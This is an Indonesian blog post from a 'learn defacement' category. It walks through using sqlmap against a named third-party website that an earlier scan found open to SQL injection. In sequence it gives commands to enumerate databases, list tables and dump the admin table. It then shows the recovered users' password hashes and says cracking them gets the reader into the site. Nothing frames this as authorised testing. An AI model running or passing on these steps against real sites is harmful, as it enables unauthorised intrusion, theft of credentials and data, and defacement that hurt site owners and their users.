Home belajar deface Hack Website With SQLMAP

Thursday 15 June 2017

Hack Website With SQLMAP

Diterbitkan
Tags

Haii broo apa kabar, baik kan :D
Setelah kemaren saya sharing tentang cek celah website dengan kali linux, dan ternyata site yg saya test tersebut mempunyai vuln sqli,yasudah bro lansung praktek aja ya

Pertama kita akan lihat dulu isi dari database situs tersebut
sqlmap.py -u www.sitetarget.com/display.php?catId=22 --dbs
sqlmap.py -u www.sitetarget.com/display.php?catId=22 --dbs

Tunggu bentar hingga muncul database target
Result database

site tersebut terdapat 2 database
[*] information_schema
[*] wwwenkay_qEnkayDB
sekarang kita akan melihat isi tabel dari database wwwenkay_qEnkayDB
sqlmap.py -u www.sitetarget.com/display.php?catId=22 -D nama_database --tables
 sqlmap.py -u www.sitetarget.com/display.php?catId=22 -D nama_database --tables

Tunggu hingga muncul tabel

Result List Table

dalam database tersebut terdapat 15 tabel,nah sekarang kita ingin melihat isi dari tabel admin
sqlmap.py -u www.sitetarget.com/display.php?catId=22 -D nama_database -Tnama_tabel --dump
sqlmap.py -u www.sitetarget.com/display.php?catId=22 -D nama_database -T nama_tabel --dump

Result Table

wah ternyata terdapat 3 user dan passwordnya berupa hash,untuk masuk ke dalam site tersebut kita harus decrypt dulu ,nah untuk cara decrypt password hash kalian bisa cari caranya di sini

Artikel Terkait

Muhammad Hafidz

Next Post
Previous Post


EmoticonEmoticon

Note: only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)